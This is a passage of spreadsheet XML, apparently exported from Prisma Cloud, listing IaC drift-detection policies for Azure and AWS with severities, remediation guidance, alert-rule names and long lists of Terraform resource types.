      <c r="AE652" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF652" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>9abc5981-57a4-49d9-9820-dd3de517e1d4</t>
        </is>
      </c>
      <c r="AI652" t="inlineStr"/>
      <c r="AJ652" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK652" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" t="inlineStr"/>
      <c r="B653" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C653" s="2" t="inlineStr"/>
      <c r="D653" t="inlineStr"/>
      <c r="E653" t="inlineStr"/>
      <c r="F653" t="inlineStr"/>
      <c r="G653" t="b">
        <v>1</v>
      </c>
      <c r="H6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jneytchev drift detected,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53" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J653" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="K653" t="inlineStr">
        <is>
          <t>Traced Azure resources are manually modified</t>
        </is>
      </c>
      <c r="L653" t="inlineStr"/>
      <c r="M653" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N653" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O653" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P653" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q653" t="inlineStr"/>
      <c r="R653" t="inlineStr"/>
      <c r="S653" t="inlineStr"/>
      <c r="T653" t="b">
        <v>0</v>
      </c>
      <c r="U653" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V653" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="W653" t="inlineStr">
        <is>
          <t>Ensure traced resources are not manually modified</t>
        </is>
      </c>
      <c r="X653" t="inlineStr">
        <is>
          <t>Open a Fix PR (Code Security &gt; Projects) for the IaC resource to fix drift, and deploy the resource after the fix is merged. Refer the documentation for more details, https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/drift-detection 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection</t>
        </is>
      </c>
      <c r="Y653" t="inlineStr"/>
      <c r="Z653" t="inlineStr">
        <is>
          <t>{"category":"Drift","resourceTypes":[]}
{"category":"Drift","resourceTypes":["azurerm_advanced_threat_protection","azurerm_analysis_services_server","azurerm_api_management","azurerm_api_management_api","azurerm_api_management_api_operation","azurerm_api_management_api_operation_policy","azurerm_api_management_api_policy","azurerm_api_management_api_schema","azurerm_api_management_api_version_set","azurerm_api_management_authorization_server","azurerm_api_management_backend","azurerm_api_management_certificate","azurerm_api_management_diagnostic","azurerm_api_management_group","azurerm_api_management_group_user","azurerm_api_management_identity_provider_aad","azurerm_api_management_identity_provider_facebook","azurerm_api_management_identity_provider_google","azurerm_api_management_identity_provider_microsoft","azurerm_api_management_identity_provider_twitter","azurerm_api_management_logger","azurerm_api_management_named_value","azurerm_api_management_openid_connect_provider","azurerm_api_management_product","azurerm_api_management_product_api","azurerm_api_management_product_group","azurerm_api_management_product_policy","azurerm_api_management_property","azurerm_api_management_subscription","azurerm_api_management_user","azurerm_app_configuration","azurerm_app_service","azurerm_app_service_active_slot","azurerm_app_service_certificate","azurerm_app_service_certificate_order","azurerm_app_service_custom_hostname_binding","azurerm_app_service_environment","azurerm_app_service_hybrid_connection","azurerm_app_service_plan","azurerm_app_service_slot","azurerm_app_service_slot_virtual_network_swift_connection","azurerm_app_service_source_control_token","azurerm_app_service_virtual_network_swift_connection","azurerm_application_gateway","azurerm_application_insights","azurerm_application_insights_analytics_item","azurerm_application_insights_api_key","azurerm_application_insights_web_test","azurerm_application_security_group","azurerm_automation_account","azurerm_automation_certificate","azurerm_automation_connection","azurerm_automation_connection_certificate","azurerm_automation_connection_classic_certificate","azurerm_automation_connection_service_principal","azurerm_automation_credential","azurerm_automation_dsc_configuration","azurerm_automation_dsc_nodeconfiguration","azurerm_automation_job_schedule","azurerm_automation_module","azurerm_automation_runbook","azurerm_automation_schedule","azurerm_automation_variable_bool","azurerm_automation_variable_datetime","azurerm_automation_variable_int","azurerm_automation_variable_string","azurerm_availability_set","azurerm_backup_container_storage_account","azurerm_backup_policy_file_share","azurerm_backup_policy_vm","azurerm_backup_protected_file_share","azurerm_backup_protected_vm","azurerm_bastion_host","azurerm_batch_account","azurerm_batch_application","azurerm_batch_certificate","azurerm_batch_pool","azurerm_blueprint_assignment","azurerm_bot_channel_directline","azurerm_bot_channel_email","azurerm_bot_channel_ms_teams","azurerm_bot_channel_slack","azurerm_bot_channels_registration","azurerm_bot_connection","azurerm_bot_web_app","azurerm_cdn_endpoint","azurerm_cdn_profile","azurerm_cognitive_account","azurerm_container_group","azurerm_container_registry","azurerm_container_registry_webhook","azurerm_cosmosdb_account","azurerm_cosmosdb_cassandra_keyspace","azurerm_cosmosdb_gremlin_database","azurerm_cosmosdb_gremlin_graph","azurerm_cosmosdb_mongo_collection","azurerm_cosmosdb_mongo_database","azurerm_cosmosdb_sql_container","azurerm_cosmosdb_sql_database","azurerm_cosmosdb_table","azurerm_cost_management_export_resource_group","azurerm_custom_provider","azurerm_dashboard","azurerm_data_factory","azurerm_data_factory_dataset_azure_blob","azurerm_data_factory_dataset_cosmosdb_sqlapi","azurerm_data_factory_dataset_delimited_text","azurerm_data_factory_dataset_http","azurerm_data_factory_dataset_json","azurerm_data_factory_dataset_mysql","azurerm_data_factory_dataset_postgresql","azurerm_data_factory_dataset_sql_server_table","azurerm_data_factory_integration_runtime_managed","azurerm_data_factory_integration_runtime_self_hosted","azurerm_data_factory_linked_service_azure_blob_storage","azurerm_data_factory_linked_service_azure_file_storage","azurerm_data_factory_linked_service_azure_function","azurerm_data_factory_linked_service_cosmosdb","azurerm_data_factory_linked_service_data_lake_storage_gen2","azurerm_data_factory_linked_service_key_vault","azurerm_data_factory_linked_service_mysql","azurerm_data_factory_linked_service_postgresql","azurerm_data_factory_linked_service_sftp","azurerm_data_factory_linked_service_sql_server","azurerm_data_factory_linked_service_web","azurerm_data_factory_pipeline","azurerm_data_factory_trigger_schedule","azurerm_data_lake_analytics_account","azurerm_data_lake_analytics_firewall_rule","azurerm_data_lake_store","azurerm_data_lake_store_file","azurerm_data_lake_store_firewall_rule","azurerm_data_share","azurerm_data_share_account","azurerm_data_share_dataset_blob_storage","azurerm_data_share_dataset_data_lake_gen1","azurerm_database_migration_project","azurerm_database_migration_service","azurerm_databricks_workspace","azurerm_dedicated_hardware_security_module","azurerm_dedicated_host","azurerm_dedicated_host_group","azurerm_dev_test_global_vm_shutdown_schedule","azurerm_dev_test_lab","azurerm_dev_test_linux_virtual_machine","azurerm_dev_test_policy","azurerm_dev_test_schedule","azurerm_dev_test_virtual_network","azurerm_dev_test_windows_virtual_machine","azurerm_devspace_controller","azurerm_disk_encryption_set","azurerm_dns_a_record","azurerm_dns_aaaa_record","azurerm_dns_caa_record","azurerm_dns_cname_record","azurerm_dns_mx_record","azurerm_dns_ns_record","azurerm_dns_ptr_record","azurerm_dns_srv_record","azurerm_dns_txt_record","azurerm_dns_zone","azurerm_eventgrid_domain","azurerm_eventgrid_domain_topic","azurerm_eventgrid_event_subscription","azurerm_eventgrid_topic","azurerm_eventhub","azurerm_eventhub_authorization_rule","azurerm_eventhub_cluster","azurerm_eventhub_consumer_group","azurerm_eventhub_namespace","azurerm_eventhub_namespace_authorization_rule","azurerm_eventhub_namespace_disaster_recovery_config","azurerm_express_route_circuit","azurerm_express_route_circuit_authorization","azurerm_express_route_circuit_peering","azurerm_express_route_gateway","azurerm_firewall","azurerm_firewall_application_rule_collection","azurerm_firewall_nat_rule_collection","azurerm_firewall_network_rule_collection","azurerm_frontdoor","azurerm_frontdoor_custom_https_configuration","azurerm_frontdoor_firewall_policy","azurerm_function_app","azurerm_function_app_slot","azurerm_hdinsight_hadoop_cluster","azurerm_hdinsight_hbase_cluster","azurerm_hdinsight_interactive_query_cluster","azurerm_hdinsight_kafka_cluster","azurerm_hdinsight_ml_services_cluster","azurerm_hdinsight_rserver_cluster","azurerm_hdinsight_spark_cluster","azurerm_hdinsight_storm_cluster","azurerm_healthcare_service","azurerm_hpc_cache","azurerm_hpc_cache_blob_target","azurerm_hpc_cache_nfs_target","azurerm_image","azurerm_iot_time_series_insights_access_policy","azurerm_iot_time_series_insights_reference_data_set","azurerm_iot_time_series_insights_standard_environment","azurerm_iotcentral_application","azurerm_iothub","azurerm_iothub_consumer_group","azurerm_iothub_dps","azurerm_iothub_dps_certificate","azurerm_iothub_dps_shared_access_policy","azurerm_iothub_endpoint_eventhub","azurerm_iothub_endpoint_servicebus_queue","azurerm_iothub_endpoint_servicebus_topic","azurerm_iothub_endpoint_storage_container","azurerm_iothub_fallback_route","azurerm_iothub_route","azurerm_iothub_shared_access_policy","azurerm_key_vault","azurerm_key_vault_access_policy","azurerm_key_vault_certificate","azurerm_key_vault_certificate_issuer","azurerm_key_vault_key","azurerm_key_vault_secret","azurerm_kubernetes_cluster","azurerm_kubernetes_cluster_node_pool","azurerm_kusto_attached_database_configuration","azurerm_kusto_cluster","azurerm_kusto_cluster_customer_managed_key","azurerm_kusto_cluster_principal_assignment","azurerm_kusto_database","azurerm_kusto_database_principal","azurerm_kusto_database_principal_assignment","azurerm_kusto_eventhub_data_connection","azurerm_lb","azurerm_lb_backend_address_pool","azurerm_lb_nat_pool","azurerm_lb_nat_rule","azurerm_lb_outbound_rule","azurerm_lb_probe","azurerm_lb_rule","azurerm_linux_virtual_machine","azurerm_linux_virtual_machine_scale_set","azurerm_local_network_gateway","azurerm_log_analytics_datasource_windows_event","azurerm_log_analytics_datasource_windows_performance_counter","azurerm_log_analytics_linked_service","azurerm_log_analytics_solution","azurerm_log_analytics_workspace","azurerm_logic_app_action_custom","azurerm_logic_app_action_http","azurerm_logic_app_integration_account","azurerm_logic_app_trigger_custom","azurerm_logic_app_trigger_http_request","azurerm_logic_app_trigger_recurrence","azurerm_logic_app_workflow","azurerm_machine_learning_workspace","azurerm_maintenance_assignment_dedicated_host","azurerm_maintenance_assignment_virtual_machine","azurerm_maintenance_configuration","azurerm_managed_application","azurerm_managed_application_definition","azurerm_managed_disk","azurerm_management_group","azurerm_management_lock","azurerm_maps_account","azurerm_mariadb_configuration","azurerm_mariadb_database","azurerm_mariadb_firewall_rule","azurerm_mariadb_server","azurerm_mariadb_virtual_network_rule","azurerm_marketplace_agreement","azurerm_media_services_account","azurerm_monitor_action_group","azurerm_monitor_action_rule_action_group","azurerm_monitor_action_rule_suppression","azurerm_monitor_activity_log_alert","azurerm_monitor_autoscale_setting","azurerm_monitor_diagnostic_setting","azurerm_monitor_log_profile","azurerm_monitor_metric_alert","azurerm_monitor_scheduled_query_rules_alert","azurerm_monitor_scheduled_query_rules_log","azurerm_mssql_database","azurerm_mssql_database_vulnerability_assessment_rule_baseline","azurerm_mssql_elasticpool","azurerm_mssql_server","azurerm_mssql_server_security_alert_policy","azurerm_mssql_server_vulnerability_assessment","azurerm_mssql_virtual_machine","azurerm_mysql_active_directory_administrator","azurerm_mysql_configuration","azurerm_mysql_database","azurerm_mysql_firewall_rule","azurerm_mysql_server","azurerm_mysql_virtual_network_rule","azurerm_nat_gateway","azurerm_nat_gateway_public_ip_association","azurerm_netapp_account","azurerm_netapp_pool","azurerm_netapp_snapshot","azurerm_netapp_volume","azurerm_network_ddos_protection_plan","azurerm_network_interface","azurerm_network_interface_application_gateway_backend_address_pool_association","azurerm_network_interface_application_security_group_association","azurerm_network_interface_backend_address_pool_association","azurerm_network_interface_nat_rule_association","azurerm_network_interface_security_group_association","azurerm_network_packet_capture","azurerm_network_profile","azurerm_network_security_group","azurerm_network_security_rule","azurerm_network_watcher","azurerm_network_watcher_flow_log","azurerm_notification_hub","azurerm_notification_hub_authorization_rule","azurerm_notification_hub_namespace","azurerm_orchestrated_virtual_machine_scale_set","azurerm_packet_capture","azurerm_point_to_site_vpn_gateway","azurerm_policy_assignment","azurerm_policy_definition","azurerm_policy_remediation","azurerm_policy_set_definition","azurerm_postgresql_active_directory_administrator","azurerm_postgresql_configuration","azurerm_postgresql_database","azurerm_postgresql_firewall_rule","azurerm_postgresql_server","azurerm_postgresql_virtual_network_rule","azurerm_powerbi_embedded","azurerm_private_dns_a_record","azurerm_private_dns_aaaa_record","azurerm_private_dns_cname_record","azurerm_private_dns_mx_record","azurerm_private_dns_ptr_record","azurerm_private_dns_srv_record","azurerm_private_dns_txt_record","azurerm_private_dns_zone","azurerm_private_dns_zone_virtual_network_link","azurerm_private_endpoint","azurerm_private_link_service","azurerm_proximity_placement_group","azurerm_public_ip","azurerm_public_ip_prefix","azurerm_recovery_services_vault","azurerm_redis_cache","azurerm_redis_firewall_rule","azurerm_relay_hybrid_connection","azurerm_relay_namespace","azurerm_resource_group","azurerm_role_assignment","azurerm_role_definition","azurerm_route","azurerm_route_filter","azurerm_route_table","azurerm_search_service","azurerm_security_center_contact","azurerm_security_center_subscription_pricing","azurerm_security_center_workspace","azurerm_sentinel_alert_rule_ms_security_incident","azurerm_sentinel_alert_rule_scheduled","azurerm_service_fabric_cluster","azurerm_servicebus_namespace","azurerm_servicebus_namespace_authorization_rule","azurerm_servicebus_namespace_network_rule_set","azurerm_servicebus_queue","azurerm_servicebus_queue_authorization_rule","azurerm_servicebus_subscription","azurerm_servicebus_subscription_rule","azurerm_servicebus_topic","azurerm_servicebus_topic_authorization_rule","azurerm_shared_image","azurerm_shared_image_gallery","azurerm_shared_image_version","azurerm_signalr_service","azurerm_site_recovery_fabric","azurerm_site_recovery_network_mapping","azurerm_site_recovery_protection_container","azurerm_site_recovery_protection_container_mapping","azurerm_site_recovery_replicated_vm","azurerm_site_recovery_replication_policy","azurerm_snapshot","azurerm_spatial_anchors_account","azurerm_spring_cloud_app","azurerm_spring_cloud_service","azurerm_sql_active_directory_administrator","azurerm_sql_database","azurerm_sql_elasticpool","azurerm_sql_failover_group","azurerm_sql_firewall_rule","azurerm_sql_server","azurerm_sql_virtual_network_rule","azurerm_storage_account","azurerm_storage_account_customer_managed_key","azurerm_storage_account_network_rules","azurerm_storage_blob","azurerm_storage_container","azurerm_storage_data_lake_gen2_filesystem","azurerm_storage_management_policy","azurerm_storage_queue","azurerm_storage_share","azurerm_storage_share_directory","azurerm_storage_table","azurerm_storage_table_entity","azurerm_stream_analytics_function_javascript_udf","azurerm_stream_analytics_job","azurerm_stream_analytics_output_blob","azurerm_stream_analytics_output_eventhub","azurerm_stream_analytics_output_mssql","azurerm_stream_analytics_output_servicebus_queue","azurerm_stream_analytics_output_servicebus_topic","azurerm_stream_analytics_reference_input_blob","azurerm_stream_analytics_stream_input_blob","azurerm_stream_analytics_stream_input_eventhub","azurerm_stream_analytics_stream_input_iothub","azurerm_subnet","azurerm_subnet_nat_gateway_association","azurerm_subnet_network_security_group_association","azurerm_subnet_route_table_association","azurerm_synapse_workspace","azurerm_template_deployment","azurerm_traffic_manager_endpoint","azurerm_traffic_manager_profile","azurerm_user_assigned_identity","azurerm_virtual_hub","azurerm_virtual_hub_connection","azurerm_virtual_machine","azurerm_virtual_machine_data_disk_attachment","azurerm_virtual_machine_extension","azurerm_virtual_machine_scale_set","azurerm_virtual_machine_scale_set_extension","azurerm_virtual_network","azurerm_virtual_network_gateway","azurerm_virtual_network_gateway_connection","azurerm_virtual_network_peering","azurerm_virtual_wan","azurerm_vpn_gateway","azurerm_vpn_server_configuration","azurerm_web_application_firewall_policy","azurerm_windows_virtual_machine","azurerm_windows_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA653" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB653" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC653" t="inlineStr">
        <is>
          <t>BC_AZR_DRIFT_2</t>
        </is>
      </c>
      <c r="AD653" t="b">
        <v>1</v>
      </c>
      <c r="AE653" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF653" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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jneytchev drift detected - Notifications:, AccountGroups:PCS SWAT Account Group - DO NOT TOUCH;,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53" t="inlineStr">
        <is>
          <t>7b9217dd-4691-49b7-9f54-7f365541ce64</t>
        </is>
      </c>
      <c r="AI653" t="inlineStr"/>
      <c r="AJ653" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK653" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" t="inlineStr"/>
      <c r="B654" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C654" s="2" t="inlineStr"/>
      <c r="D654" t="n">
        <v>3</v>
      </c>
      <c r="E654" t="n">
        <v>10</v>
      </c>
      <c r="F654" t="n">
        <v>0</v>
      </c>
      <c r="G654" t="b">
        <v>1</v>
      </c>
      <c r="H654" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, CM Drift Test,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 Drift Alert Rule, tadenugba_Test_Rule, tadenugba_Test_Rule1, tag owner madavis1, test SI - XN, test-ebs, test-ebs-1, test-mms-may-15, test-yor-tushir, test1_alert_rules_20231006, testrule, testrule1, tushir-dell</t>
        </is>
      </c>
      <c r="I654" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J654" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="K654" t="inlineStr">
        <is>
          <t>AWS traced resources are manually modified</t>
        </is>
      </c>
      <c r="L654" t="inlineStr"/>
      <c r="M654" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N654" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O654" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P654" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q654" t="inlineStr"/>
      <c r="R654" t="inlineStr"/>
      <c r="S654" t="inlineStr"/>
      <c r="T654" t="b">
        <v>0</v>
      </c>
      <c r="U654" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V654" t="inlineStr">
        <is>
          <t>IaC:Drift:</t>
        </is>
      </c>
      <c r="W654" t="inlineStr">
        <is>
          <t>Ensure traced resources are not manually modified</t>
        </is>
      </c>
      <c r="X654" t="inlineStr">
        <is>
          <t>Open a Fix PR (Code Security &gt; Projects) for the IaC resource to fix drift, and deploy the resource after the fix is merged. Refer the documentation for more details, https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-admin-code-security/scan-monitor/drift-detection 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/drift-detection</t>
        </is>
      </c>
      <c r="Y654" t="inlineStr"/>
      <c r="Z654" t="inlineStr">
        <is>
          <t>{"category":"Drift","resourceTypes":[]}
{"category":"Drift","resourceTypes":["aws_accessanalyzer_analyzer","aws_acm_certificate","aws_acm_certificate_validation","aws_acmpca_certificate_authority","aws_ami","aws_ami_copy","aws_ami_from_instance","aws_ami_launch_permission","aws_api_gateway_account","aws_api_gateway_api_key","aws_api_gateway_authorizer","aws_api_gateway_base_path_mapping","aws_api_gateway_client_certificate","aws_api_gateway_deployment","aws_api_gateway_documentation_part","aws_api_gateway_documentation_version","aws_api_gateway_domain_name","aws_api_gateway_gateway_response","aws_api_gateway_integration","aws_api_gateway_integration_response","aws_api_gateway_method","aws_api_gateway_method_response","aws_api_gateway_method_settings","aws_api_gateway_model","aws_api_gateway_request_validator","aws_api_gateway_resource","aws_api_gateway_rest_api","aws_api_gateway_stage","aws_api_gateway_usage_plan","aws_api_gateway_usage_plan_key","aws_api_gateway_vpc_link","aws_apigatewayv2_api","aws_apigatewayv2_api_mapping","aws_apigatewayv2_authorizer","aws_apigatewayv2_deployment","aws_apigatewayv2_domain_name","aws_apigatewayv2_integration","aws_apigatewayv2_integration_response","aws_apigatewayv2_model","aws_apigatewayv2_route","aws_apigatewayv2_route_response","aws_apigatewayv2_stage","aws_apigatewayv2_vpc_link","aws_app_cookie_stickiness_policy","aws_appautoscaling_policy","aws_appautoscaling_scheduled_action","aws_appautoscaling_target","aws_appmesh_mesh","aws_appmesh_route","aws_appmesh_virtual_node","aws_appmesh_virtual_router","aws_appmesh_virtual_service","aws_appsync_api_key","aws_appsync_datasource","aws_appsync_function","aws_appsync_graphql_api","aws_appsync_resolver","aws_athena_database","aws_athena_named_query","aws_athena_workgroup","aws_autoscaling_attachment","aws_autoscaling_group","aws_autoscaling_lifecycle_hook","aws_autoscaling_notification","aws_autoscaling_policy","aws_autoscaling_schedule","aws_backup_plan","aws_backup_selection","aws_backup_vault","aws_batch_compute_environment","aws_batch_job_definition","aws_batch_job_queue","aws_budgets_budget","aws_cloud9_environment_ec2","aws_cloudformation_stack","aws_cloudformation_stack_set","aws_cloudformation_stack_set_instance","aws_cloudfront_distribution","aws_cloudfront_origin_access_identity","aws_cloudfront_public_key","aws_cloudhsm_v2_cluster","aws_cloudhsm_v2_hsm","aws_cloudtrail","aws_cloudwatch_dashboard","aws_cloudwatch_event_permission","aws_cloudwatch_event_rule","aws_cloudwatch_event_target","aws_cloudwatch_log_destination","aws_cloudwatch_log_destination_policy","aws_cloudwatch_log_group","aws_cloudwatch_log_metric_filter","aws_cloudwatch_log_resource_policy","aws_cloudwatch_log_stream","aws_cloudwatch_log_subscription_filter","aws_cloudwatch_metric_alarm","aws_codebuild_project","aws_codebuild_source_credential","aws_codebuild_webhook","aws_codecommit_repository","aws_codecommit_trigger","aws_codedeploy_app","aws_codedeploy_deployment_config","aws_codedeploy_deployment_group","aws_codepipeline","aws_codepipeline_webhook","aws_codestarnotifications_notification_rule","aws_cognito_identity_pool","aws_cognito_identity_pool_roles_attachment","aws_cognito_identity_provider","aws_cognito_resource_server","aws_cognito_user_group","aws_cognito_user_pool","aws_cognito_user_pool_client","aws_cognito_user_pool_domain","aws_config_aggregate_authorization","aws_config_config_rule","aws_config_configuration_aggregator","aws_config_configuration_recorder","aws_config_configuration_recorder_status","aws_config_delivery_channel","aws_config_organization_custom_rule","aws_config_organization_managed_rule","aws_cur_report_definition","aws_customer_gateway","aws_datapipeline_pipeline","aws_datasync_agent","aws_datasync_location_efs","aws_datasync_location_nfs","aws_datasync_location_s3","aws_datasync_location_smb","aws_datasync_task","aws_dax_cluster","aws_dax_parameter_group","aws_dax_subnet_group","aws_db_cluster_snapshot","aws_db_event_subscription","aws_db_instance","aws_db_instance_role_association","aws_db_option_group","aws_db_parameter_group","aws_db_security_group","aws_db_snapshot","aws_db_subnet_group","aws_default_network_acl","aws_default_route_table","aws_default_security_group","aws_default_subnet","aws_default_vpc","aws_default_vpc_dhcp_options","aws_devicefarm_project","aws_directory_service_conditional_forwarder","aws_directory_service_directory","aws_directory_service_log_subscription","aws_dlm_lifecycle_policy","aws_dms_certificate","aws_dms_endpoint","aws_dms_event_subscription","aws_dms_replication_instance","aws_dms_replication_subnet_group","aws_dms_replication_task","aws_docdb_cluster","aws_docdb_cluster_instance","aws_docdb_cluster_parameter_group","aws_docdb_cluster_snapshot","aws_docdb_subnet_group","aws_dx_bgp_peer","aws_dx_connection","aws_dx_connection_association","aws_dx_gateway","aws_dx_gateway_association","aws_dx_gateway_association_proposal","aws_dx_hosted_private_virtual_interface","aws_dx_hosted_private_virtual_interface_accepter","aws_dx_hosted_public_virtual_interface","aws_dx_hosted_public_virtual_interface_accepter","aws_dx_hosted_transit_virtual_interface","aws_dx_hosted_transit_virtual_interface_accepter","aws_dx_lag","aws_dx_private_virtual_interface","aws_dx_public_virtual_interface","aws_dx_transit_virtual_interface","aws_dynamodb_global_table","aws_dynamodb_table","aws_dynamodb_table_item","aws_ebs_default_kms_key","aws_ebs_encryption_by_default","aws_ebs_snapshot","aws_ebs_snapshot_copy","aws_ebs_volume","aws_ec2_availability_zone_group","aws_ec2_capacity_reservation","aws_ec2_client_vpn_authorization_rule","aws_ec2_client_vpn_endpoint","aws_ec2_client_vpn_network_association","aws_ec2_client_vpn_route","aws_ec2_fleet","aws_ec2_local_gateway_route","aws_ec2_local_gateway_route_table_vpc_association","aws_ec2_tag","aws_ec2_traffic_mirror_filter","aws_ec2_traffic_mirror_filter_rule","aws_ec2_traffic_mirror_session","aws_ec2_traffic_mirror_target","aws_ec2_transit_gateway","aws_ec2_transit_gateway_peering_attachment","aws_ec2_transit_gateway_peering_attachment_accepter","aws_ec2_transit_gateway_route","aws_ec2_transit_gateway_route_table","aws_ec2_transit_gateway_route_table_association","aws_ec2_transit_gateway_route_table_propagation","aws_ec2_transit_gateway_vpc_attachment","aws_ec2_transit_gateway_vpc_attachment_accepter","aws_ecr_lifecycle_policy","aws_ecr_repository","aws_ecr_repository_policy","aws_ecs_capacity_provider","aws_ecs_cluster","aws_ecs_service","aws_ecs_task_definition","aws_efs_access_point","aws_efs_file_system","aws_efs_file_system_policy","aws_efs_mount_target","aws_egress_only_internet_gateway","aws_eip","aws_eip_association","aws_eks_cluster","aws_eks_fargate_profile","aws_eks_node_group","aws_elastic_beanstalk_application","aws_elastic_beanstalk_application_version","aws_elastic_beanstalk_configuration_template","aws_elastic_beanstalk_environment","aws_elasticache_cluster","aws_elasticache_parameter_group","aws_elasticache_replication_group","aws_elasticache_security_group","aws_elasticache_subnet_group","aws_elasticsearch_domain","aws_elasticsearch_domain_policy","aws_elastictranscoder_pipeline","aws_elastictranscoder_preset","aws_elb","aws_elb_attachment","aws_emr_cluster","aws_emr_instance_group","aws_emr_security_configuration","aws_flow_log","aws_fms_admin_account","aws_fsx_lustre_file_system","aws_fsx_windows_file_system","aws_gamelift_alias","aws_gamelift_build","aws_gamelift_fleet","aws_gamelift_game_session_queue","aws_glacier_vault","aws_glacier_vault_lock","aws_globalaccelerator_accelerator","aws_globalaccelerator_endpoint_group","aws_globalaccelerator_listener","aws_glue_catalog_database","aws_glue_catalog_table","aws_glue_classifier","aws_glue_connection","aws_glue_crawler","aws_glue_job","aws_glue_security_configuration","aws_glue_trigger","aws_glue_workflow","aws_guardduty_detector","aws_guardduty_invite_accepter","aws_guardduty_ipset","aws_guardduty_member","aws_guardduty_organization_admin_account","aws_guardduty_organization_configuration","aws_guardduty_threatintelset","aws_iam_access_key","aws_iam_account_alias","aws_iam_account_password_policy","aws_iam_group","aws_iam_group_membership","aws_iam_group_policy","aws_iam_group_policy_attachment","aws_iam_instance_profile","aws_iam_openid_connect_provider","aws_iam_policy","aws_iam_policy_attachment","aws_iam_role","aws_iam_role_policy","aws_iam_role_policy_attachment","aws_iam_saml_provider","aws_iam_server_certificate","aws_iam_service_linked_role","aws_iam_user","aws_iam_user_group_membership","aws_iam_user_login_profile","aws_iam_user_policy","aws_iam_user_policy_attachment","aws_iam_user_ssh_key","aws_inspector_assessment_target","aws_inspector_assessment_template","aws_inspector_resource_group","aws_instance","aws_internet_gateway","aws_iot_certificate","aws_iot_policy","aws_iot_policy_attachment","aws_iot_role_alias","aws_iot_thing","aws_iot_thing_principal_attachment","aws_iot_thing_type","aws_iot_topic_rule","aws_key_pair","aws_kinesis_analytics_application","aws_kinesis_firehose_delivery_stream","aws_kinesis_stream","aws_kinesis_video_stream","aws_kms_alias","aws_kms_ciphertext","aws_kms_external_key","aws_kms_grant","aws_kms_key","aws_lambda_alias","aws_lambda_event_source_mapping","aws_lambda_function","aws_lambda_function_event_invoke_config","aws_lambda_layer_version","aws_lambda_permission","aws_lambda_provisioned_concurrency_config","aws_launch_configuration","aws_launch_template","aws_lb","aws_lb_cookie_stickiness_policy","aws_lb_listener","aws_lb_listener_certificate","aws_lb_listener_rule","aws_lb_ssl_negotiation_policy","aws_lb_target_group","aws_lb_target_group_attachment","aws_licensemanager_association","aws_licensemanager_license_configuration","aws_lightsail_domain","aws_lightsail_instance","aws_lightsail_key_pair","aws_lightsail_static_ip","aws_lightsail_static_ip_attachment","aws_load_balancer_backend_server_policy","aws_load_balancer_listener_policy","aws_load_balancer_policy","aws_macie_member_account_association","aws_macie_s3_bucket_association","aws_main_route_table_association","aws_media_convert_queue","aws_media_package_channel","aws_media_store_container","aws_media_store_container_policy","aws_mq_broker","aws_mq_configuration","aws_msk_cluster","aws_msk_configuration","aws_nat_gateway","aws_neptune_cluster","aws_neptune_cluster_instance","aws_neptune_cluster_parameter_group","aws_neptune_cluster_snapshot","aws_neptune_event_subscription","aws_neptune_parameter_group","aws_neptune_subnet_group","aws_network_acl","aws_network_acl_rule","aws_network_interface","aws_network_interface_attachment","aws_network_interface_sg_attachment","aws_opsworks_application","aws_opsworks_custom_layer","aws_opsworks_ganglia_layer","aws_opsworks_haproxy_layer","aws_opsworks_instance","aws_opsworks_java_app_layer","aws_opsworks_memcached_layer","aws_opsworks_mysql_layer","aws_opsworks_nodejs_app_layer","aws_ops